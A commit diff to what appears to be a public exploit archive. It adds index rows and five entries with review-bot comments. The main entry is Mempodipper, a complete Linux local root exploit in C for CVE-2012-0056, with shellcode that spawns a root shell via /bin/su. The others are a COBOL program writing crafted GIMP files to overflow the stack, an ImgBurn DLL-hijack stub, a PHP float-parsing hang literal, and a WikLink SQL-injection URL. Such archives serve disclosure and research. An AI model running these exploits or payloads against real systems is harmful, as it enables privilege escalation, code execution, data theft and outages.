Updated 11_07_2014

This commit is contained in:
Offensive Security 2014-11-07 04:45:10 +00:00
parent ffc4f99bcc
commit 025d2b1b6e
6 changed files with 495 additions and 0 deletions


@ -31669,3 +31669,8 @@ id,file,description,date,author,platform,type,port
35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0 35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0
35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0 35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0
35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0 35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0
35161,platforms/linux/local/35161.txt,"Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2",2012-01-12,zx2c4,linux,local,0
35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0
35163,platforms/windows/dos/35163.c,"ImgBurn 2.4 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-01-01,d3c0der,windows,dos,0
35164,platforms/php/dos/35164.php,"PHP <= 5.3.2 'zend_strtod()' Function Floating-Point Value Denial of Service Vulnerability",2011-01-03,"Rick Regan",php,dos,0
35165,platforms/php/webapps/35165.txt,"WikLink 0.1.3 'getURL.php' SQL Injection Vulnerability",2011-01-05,"Aliaksandr Hartsuyeu",php,webapps,0
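Review bot: several of the new files.csv rows disagree with the headers inside the files they index. Row 35162 says "GIMP <= 2.6.7" while 35162.cob states "GIMP 2.6.11 is vulnerable"; row 35164 says "PHP <= 5.3.2" while 35164.php states "PHP 5.3.3 is vulnerable"; row 35161 is dated 2012-01-12 while the Mempodipper header inside 35161.txt is dated Jan 21, 2012. Row 35163 is also filed under type "dos" although both its own description and the file header call it arbitrary code execution. Reconcile each pair before merging, since the csv is what the archive's search and listings are built from.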


platforms/linux/dos/35162.cob Executable file

@ -0,0 +1,162 @@
source: http://www.securityfocus.com/bid/45647/info
GIMP is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate checks on user-supplied input.
Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
GIMP 2.6.11 is vulnerable; other versions may also be affected.
000010 IDENTIFICATION DIVISION.
000020 PROGRAM-ID. GIMP-OVERFLOWS-POC-IN-COBOL.
000030 AUTHOR. NON-CUSTOMERS CREW.
000040*SHOE SIZE DECLARATION. 43.
000050
000060 ENVIRONMENT DIVISION.
000070 INPUT-OUTPUT SECTION.
000080 FILE-CONTROL.
000090 SELECT FILE01 ASSIGN TO "GIMP01.LIGHTINGPRESETS"
000100 ORGANIZATION IS LINE SEQUENTIAL.
000110 SELECT FILE02 ASSIGN TO "GIMP02.SPHEREDESIGNER"
000120 ORGANIZATION IS LINE SEQUENTIAL.
000130 SELECT FILE03 ASSIGN TO "GIMP03.GFIG"
000140 ORGANIZATION IS LINE SEQUENTIAL.
000150* FOR THE 4TH OVERFLOW, SEE BELOW.
000160
000170 DATA DIVISION.
000180 FILE SECTION.
000190 FD FILE01.
000200 01 PRINTLINE PIC X(800).
000210 FD FILE02.
000220 01 QRINTLINE PIC X(800).
000230 FD FILE03.
000240 01 RRINTLINE PIC X(800).
000250
000260 WORKING-STORAGE SECTION.
000270 01 TEXT-OUT1 PIC X(29) VALUE 'Number of lights: 1'.
000280 01 TEXT-OUT2 PIC X(29) VALUE 'Type: Point'.
000290 01 TEXT-OUT3 PIC X(29) VALUE 'Position: A'.
000300 01 TEXT-OUT4 PIC X(29) VALUE 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
000310 01 TEXT-OUT5 PIC X(29) VALUE ' -1 1'.
000320 01 TEXT-OUT6 PIC X(29) VALUE 'Direction: -1 -1 1'.
000330 01 TEXT-OUT7 PIC X(29) VALUE 'Color: 1 1 1'.
000340 01 TEXT-OUT8 PIC X(29) VALUE 'Intensity: 1'.
000350 01 TEXU-OUT1 PIC X(29) VALUE '0 0 A'.
000360 01 TEXU-OUT2 PIC X(29) VALUE 'A 1 1 1 0 0 0 1 1 0 1 1 1 1 1'.
000370 01 TEXU-OUT3 PIC X(29) VALUE '0 0 0 0 0 0 0'.
000380 01 TEXV-OUT1 PIC X(29) VALUE 'GFIG Version 0.2'.
000390 01 TEXV-OUT2 PIC X(29) VALUE 'Name: First\040Gfig'.
000400 01 TEXV-OUT3 PIC X(29) VALUE 'Version: 0.000000'.
000410 01 TEXV-OUT4 PIC X(29) VALUE 'ObjCount: 0'.
000420 01 TEXV-OUT5 PIC X(29) VALUE '<OPTIONS>'.
000430 01 TEXV-OUT6 PIC X(29) VALUE 'GridSpacing: 30'.
000440 01 TEXV-OUT7 PIC X(29) VALUE 'GridType: RECT_GRID'.
000450 01 TEXV-OUT8 PIC X(29) VALUE 'DrawGrid: FALSE'.
000460 01 TEXV-OUT9 PIC X(29) VALUE 'Snap2Grid: FALSE'.
000470 01 TEXV-OUTA PIC X(29) VALUE 'LockOnGrid: FALSE'.
000480 01 TEXV-OUTB PIC X(29) VALUE 'ShowControl: TRUE'.
000490 01 TEXV-OUTC PIC X(29) VALUE '</OPTIONS>'.
000500 01 TEXV-OUTD PIC X(29) VALUE '<Style Base>'.
000510 01 TEXV-OUTE PIC X(29) VALUE 'BrushName: Circle (11)'.
000520 01 TEXV-OUTF PIC X(29) VALUE 'PaintType: 1'.
000530 01 TEXV-OUTG PIC X(29) VALUE 'FillType: 0'.
000540 01 TEXV-OUTH PIC X(29) VALUE 'FillOpacity: 100'.
000550 01 TEXV-OUTI PIC X(29) VALUE 'Pattern: Pine'.
000560 01 TEXV-OUTJ PIC X(29) VALUE 'Gradient: FG to BG (RGB)'.
000570 01 TEXV-OUTK PIC X(29) VALUE 'Foreground: A'.
000580 01 TEXV-OUTL PIC X(29) VALUE 'AA 0 0 1'.
000590 01 TEXV-OUTM PIC X(29) VALUE 'Background: 1 1 1 1'.
000600 01 TEXV-OUTN PIC X(29) VALUE '</Style>'.
000610
000620 PROCEDURE DIVISION.
000630 MAIN-PARAGRAPH.
000640* 1. FILTERS > LIGHT AND SHADOW > LIGHTING EFFECTS > LIGHT > OPEN
000650 OPEN OUTPUT FILE01.
000660 WRITE PRINTLINE FROM TEXT-OUT1.
000670 WRITE PRINTLINE FROM TEXT-OUT2.
000680 WRITE PRINTLINE FROM TEXT-OUT3 AFTER ADVANCING 0 LINES.
000690 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000700 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000710 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000720 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000730 WRITE PRINTLINE FROM TEXT-OUT5.
000740 WRITE PRINTLINE FROM TEXT-OUT6.
000750 WRITE PRINTLINE FROM TEXT-OUT7.
000760 WRITE PRINTLINE FROM TEXT-OUT8.
000770 CLOSE FILE01.
000780
000790* 2. FILTERS > RENDER > SPHERE DESIGNER > OPEN
000800 OPEN OUTPUT FILE02.
000810 WRITE QRINTLINE FROM TEXU-OUT1 AFTER ADVANCING 0 LINES.
000820 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000830 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000840 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000850 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000860 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000870 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000880 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000890 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000900 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000910 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000920 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000930 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000940 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000950 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000960 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000970 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000980 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000990 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001000 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001010 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001020 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001030 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001040 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001050 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001060 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001070 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001080 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001090 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001100 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001110 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001120 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001130 WRITE QRINTLINE FROM TEXU-OUT2 AFTER ADVANCING 0 LINES.
001140 WRITE QRINTLINE FROM TEXU-OUT3.
001150 CLOSE FILE02.
001160
001170* 3. FILTERS > RENDER > GFIG > FILE > OPEN
001180 OPEN OUTPUT FILE03.
001190 WRITE RRINTLINE FROM TEXV-OUT1.
001200 WRITE RRINTLINE FROM TEXV-OUT2.
001210 WRITE RRINTLINE FROM TEXV-OUT3.
001220 WRITE RRINTLINE FROM TEXV-OUT4.
001230 WRITE RRINTLINE FROM TEXV-OUT5.
001240 WRITE RRINTLINE FROM TEXV-OUT6.
001250 WRITE RRINTLINE FROM TEXV-OUT7.
001260 WRITE RRINTLINE FROM TEXV-OUT8.
001270 WRITE RRINTLINE FROM TEXV-OUT9.
001280 WRITE RRINTLINE FROM TEXV-OUTA.
001290 WRITE RRINTLINE FROM TEXV-OUTB.
001300 WRITE RRINTLINE FROM TEXV-OUTC.
001310 WRITE RRINTLINE FROM TEXV-OUTD.
001320 WRITE RRINTLINE FROM TEXV-OUTE.
001330 WRITE RRINTLINE FROM TEXV-OUTF.
001340 WRITE RRINTLINE FROM TEXV-OUTG.
001350 WRITE RRINTLINE FROM TEXV-OUTH.
001360 WRITE RRINTLINE FROM TEXV-OUTI.
001370 WRITE RRINTLINE FROM TEXV-OUTJ.
001380 WRITE RRINTLINE FROM TEXV-OUTK AFTER ADVANCING 0 LINES.
001390 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001400 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001410 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001420 WRITE RRINTLINE FROM TEXV-OUTL.
001430 WRITE RRINTLINE FROM TEXV-OUTM.
001440 WRITE RRINTLINE FROM TEXV-OUTN.
001450 CLOSE FILE03.
001460
001470* 4. THE FUNCTION "read_channel_data()" IN plug-ins/common/file-psp.c HAS AN
001480* OVERFLOW WHEN HANDLING PSP_COMP_RLE TYPE FILES. A MALICIOUS FILE THAT
001490* STARTS A LONG RUNCOUNT AT THE END OF AN IMAGE WILL WRITE OUTSIDE OF
001500* ALLOCATED MEMORY. WE DON'T HAVE A POC FOR THIS BUG.
001510
001520* HAPPY NEW YEAR!!! http://rock-madrid.com/
001530
001540 STOP RUN.
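Review bot: the four header lines placed ahead of `000010 IDENTIFICATION DIVISION.` (the "source:" line and the three sentences that follow it) are not COBOL comments, so the file as committed will not compile as fixed-form COBOL; either move them into `*` comment lines in column 7, matching the style of `000040*SHOE SIZE DECLARATION. 43.`, or keep them outside the source. The same header says 2.6.11 is affected while the csv row says <= 2.6.7. The `001470* 4.` comment block documents a fourth overflow in `read_channel_data()` of `plug-ins/common/file-psp.c` for which there is no PoC; since the csv title promises "Multiple File Plugins", the header should state that only the three file-based overflows (lighting presets, sphere designer, gfig) are exercised and the PSP RLE one is description only.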

platforms/linux/local/35161.txt Executable file

@ -0,0 +1,291 @@
/*Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
Blog post about it is here: http://blog.zx2c4.com/749
*/
/*
* Mempodipper
* by zx2c4
*
* Linux Local Root Exploit
*
* Rather than put my write up here, per usual, this time I've put it
* in a rather lengthy blog post: http://blog.zx2c4.com/749
*
* Enjoy.
*
* - zx2c4
* Jan 21, 2012
*
* CVE-2012-0056
*/
#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/ptrace.h>
#include <sys/reg.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>
char *prog_name;
int send_fd(int sock, int fd)
{
char buf[1];
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmsg;
int n;
char cms[CMSG_SPACE(sizeof(int))];
buf[0] = 0;
iov.iov_base = buf;
iov.iov_len = 1;
memset(&msg, 0, sizeof msg);
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = (caddr_t)cms;
msg.msg_controllen = CMSG_LEN(sizeof(int));
cmsg = CMSG_FIRSTHDR(&msg);
cmsg->cmsg_len = CMSG_LEN(sizeof(int));
cmsg->cmsg_level = SOL_SOCKET;
cmsg->cmsg_type = SCM_RIGHTS;
memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
return -1;
close(sock);
return 0;
}
int recv_fd(int sock)
{
int n;
int fd;
char buf[1];
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmsg;
char cms[CMSG_SPACE(sizeof(int))];
iov.iov_base = buf;
iov.iov_len = 1;
memset(&msg, 0, sizeof msg);
msg.msg_name = 0;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = (caddr_t)cms;
msg.msg_controllen = sizeof cms;
if ((n = recvmsg(sock, &msg, 0)) < 0)
return -1;
if (n == 0)
return -1;
cmsg = CMSG_FIRSTHDR(&msg);
memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
close(sock);
return fd;
}
unsigned long ptrace_address()
{
int fd[2];
printf("[+] Creating ptrace pipe.\n");
pipe(fd);
fcntl(fd[0], F_SETFL, O_NONBLOCK);
printf("[+] Forking ptrace child.\n");
int child = fork();
if (child) {
close(fd[1]);
char buf;
printf("[+] Waiting for ptraced child to give output on syscalls.\n");
for (;;) {
wait(NULL);
if (read(fd[0], &buf, 1) > 0)
break;
ptrace(PTRACE_SYSCALL, child, NULL, NULL);
}
printf("[+] Error message written. Single stepping to find address.\n");
struct user_regs_struct regs;
for (;;) {
ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
wait(NULL);
ptrace(PTRACE_GETREGS, child, NULL, &regs);
#if defined(__i386__)
#define instruction_pointer regs.eip
#define upper_bound 0xb0000000
#elif defined(__x86_64__)
#define instruction_pointer regs.rip
#define upper_bound 0x700000000000
#else
#error "That platform is not supported."
#endif
if (instruction_pointer < upper_bound) {
unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
return instruction_pointer;
}
}
} else {
printf("[+] Ptrace_traceme'ing process.\n");
if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) {
perror("[-] ptrace");
return 0;
}
close(fd[0]);
dup2(fd[1], 2);
execl("/bin/su", "su", "not-a-valid-user", NULL);
}
return 0;
}
unsigned long objdump_address()
{
FILE *command = popen("objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
if (!command) {
perror("[-] popen");
return 0;
}
char result[32];
fgets(result, 32, command);
pclose(command);
return strtoul(result, NULL, 16);
}
unsigned long find_address()
{
printf("[+] Ptracing su to find next instruction without reading binary.\n");
unsigned long address = ptrace_address();
if (!address) {
printf("[-] Ptrace failed.\n");
printf("[+] Reading su binary with objdump to find exit@plt.\n");
address = objdump_address();
if (address == ULONG_MAX || !address) {
printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name);
exit(-1);
}
}
printf("[+] Resolved call address to 0x%lx.\n", address);
return address;
}
int su_padding()
{
printf("[+] Calculating su padding.\n");
FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r");
if (!command) {
perror("[-] popen");
exit(1);
}
char result[256];
fgets(result, 256, command);
pclose(command);
return strstr(result, "this-user-does-not-exist") - result;
}
int child(int sock)
{
char parent_mem[256];
sprintf(parent_mem, "/proc/%d/mem", getppid());
printf("[+] Opening parent mem %s in child.\n", parent_mem);
int fd = open(parent_mem, O_RDWR);
if (fd < 0) {
perror("[-] open");
return 1;
}
printf("[+] Sending fd %d to parent.\n", fd);
send_fd(sock, fd);
return 0;
}
int parent(unsigned long address)
{
int sockets[2];
printf("[+] Opening socketpair.\n");
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {
perror("[-] socketpair");
return 1;
}
if (fork()) {
printf("[+] Waiting for transferred fd in parent.\n");
int fd = recv_fd(sockets[1]);
printf("[+] Received fd at %d.\n", fd);
if (fd < 0) {
perror("[-] recv_fd");
return 1;
}
printf("[+] Assigning fd %d to stderr.\n", fd);
dup2(2, 15);
dup2(fd, 2);
unsigned long offset = address - su_padding();
printf("[+] Seeking to offset 0x%lx.\n", offset);
lseek64(fd, offset, SEEK_SET);
#if defined(__i386__)
// See shellcode-32.s in this package for the source.
char shellcode[] =
"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
"\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
"\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
"\x80";
#elif defined(__x86_64__)
// See shellcode-64.s in this package for the source.
char shellcode[] =
"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
"\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
"\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
"\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
"\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
printf("[+] Executing su with shellcode.\n");
execl("/bin/su", "su", shellcode, NULL);
} else {
char sock[32];
sprintf(sock, "%d", sockets[0]);
printf("[+] Executing child from child fork.\n");
execl("/proc/self/exe", prog_name, "-c", sock, NULL);
}
return 0;
}
int main(int argc, char **argv)
{
prog_name = argv[0];
if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c')
return child(atoi(argv[2]));
printf("===============================\n");
printf("= Mempodipper =\n");
printf("= by zx2c4 =\n");
printf("= Jan 21, 2012 =\n");
printf("===============================\n\n");
if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
return parent(strtoul(argv[2], NULL, 16));
else
return parent(find_address());
}
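Review bot: the comments `// See shellcode-32.s in this package for the source.` and `// See shellcode-64.s in this package for the source.` refer to assembly files that are not part of this commit, so the byte strings cannot be reviewed against their source here; either include the listings as comments or point the reference at the upstream URL given in the file's first line. Related, `dup2(2, 15);` in `parent()` uses a magic descriptor number that the shellcode depends on and deserves a one-line comment. On a minor note, the return values of `pipe(fd)` in `ptrace_address()` and of `fgets()` in both `objdump_address()` and `su_padding()` are never checked, so a failed read is silently parsed as an address or offset.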

platforms/php/dos/35164.php Executable file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45668/info
PHP is prone to a remote denial-of-service vulnerability.
Successful attacks will cause applications written in PHP to hang, creating a denial-of-service condition.
PHP 5.3.3 is vulnerable; other versions may also be affected.
<?php $d = 2.2250738585072011e-308; ?>
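Review bot: the header states "PHP 5.3.3 is vulnerable" but the csv row for 35164 says "PHP <= 5.3.2"; pick one. The file also says nothing about the failure mode beyond "hang"; a sentence noting that the single literal `2.2250738585072011e-308` is what triggers the hang in `zend_strtod()` (the function named in the csv title) would let someone grepping the archive understand the one-liner without opening the csv.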

platforms/php/webapps/35165.txt

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45673/info
WikLink is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
WikLink 0.1.3 is vulnerable; other versions may also be affected.
http://www.example.com/wiklink/getURL.php?id=-1' union select 1111/*
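Review bot: the proof-of-concept URL is the only technical content in this entry; the header should name the injected parameter (`id` in `getURL.php`, as the URL shows) and the request method, so the entry can be matched against the csv title "'getURL.php' SQL Injection" and against web server access logs without having to parse the URL by hand.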

platforms/windows/dos/35163.c Executable file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/45657/info
ImgBurn is prone to an arbitrary-code-execution vulnerability.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
ImgBurn 2.4.0.0 is vulnerable; other versions may also be affected.
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }
int egg()
{
system ("calc");
exit(0);
return 0;
}
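Review bot: `egg()` is called from `DwmSetWindowAttribute()` before it is declared, so the build relies on an implicit function declaration (an error under C99 and later, a warning on older compilers); add `int egg(void);` above the export or move `egg()` above it. `system()` and `exit()` need `#include <stdlib.h>`, and the `return 0;` after `exit(0);` is unreachable. The four header lines above `#include <windows.h>` are not C comments either, so the file does not compile as committed; wrapping them in `/* ... */` would fix that. Finally, the csv files this entry as type "dos" while the header calls it arbitrary code execution.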